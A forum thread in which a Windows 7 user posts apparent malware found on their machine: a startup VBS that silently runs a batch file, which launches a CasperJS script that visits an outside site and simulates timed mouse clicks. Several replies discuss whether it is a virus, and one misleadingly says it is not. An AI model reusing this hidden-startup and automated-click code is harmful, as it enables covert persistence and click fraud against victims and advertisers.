# CasperJS and "extensafree" virus

Tags: windows-7, windows, virus, malware

Today when i booted up my computer and when windows had loaded, Notepad++ opened which had the following file loaded into it:

```
Set shell = WScript.CreateObject("WScript.Shell")
shell.Run("C:\projects\bat.bat"), 0 , True
```

I then went to investigate the "projects" folder and found that there was 2 programs called casperjs and phantomjs. bat.bat file has the following code in it:

```
@echo off
timeout /t 600
cd/projects
phantomjs master.js
```

master.js is the most suspicious file because of the code in it:

```
phantom.casperPath = "/projects/casperjs";
phantom.injectJs(phantom.casperPath + '/bin/bootstrap.js');

var utils = require('utils');

var casper = require('casper').create();

var mouse = require("mouse").create(casper);

casper.userAgent('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36');
casper.start('http://www.extensafree.fulba.com/views/').viewport(1200, 1000);

function getRandomIntFromRange(min, max) {
    return Math.round(Math.random() * (max - min)) + min;
}    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 6000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(190, 205);
                      });
          };    
          })(i, delay));
}    
});

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 5000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

                  });
          };    
          })(i, delay));
}    
});


casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 7000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(900, 400);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 18000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(400, 100);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  };
      })(i, de    lay));
    }
});    

casper.then(function () {
    casper.exit();
});    

casper.run();
```

I immediately moved these folders and removed the shell.vbs from windows start menu startup folder. Is this some kind of virus and do i need to do any further cleaning? I have Avast antivirus free version and Windows 7. Both fully updated.

Comment: Yes;  You are infected.  I suggest you wipe your system and reinstall Windows.

Answer (score 0):

I think, this isn't a virus or anything like that.

> CasperJS is a navigation scripting & testing utility for PhantomJS and SlimerJS written in Javascript

It's just a JS framework so it may be true that your script is a bad piece of code!
This is the official [website](http://casperjs.org) ! They are open source so you can proof everything! (Most antivirus software got a function like "send in" and the company will test the sent in program.)

Comment: Whilst CasperJS itself isn't a virus, it's quite possible for it to be used for nefarious purposes. It's hard to tell what the script is doing without running it but it looks like it's simulating mouse clicks on some random site which can't be good.

Comment: That's possible ! Let's contact CasperJS if they know something about a virus named CasperJS ...

Comment: It's a Javascript framework, it can be used for good or bad, there is no way for the developers to control what other people use it for.

Comment: True story... Just be careful when handling 'foreign' scripts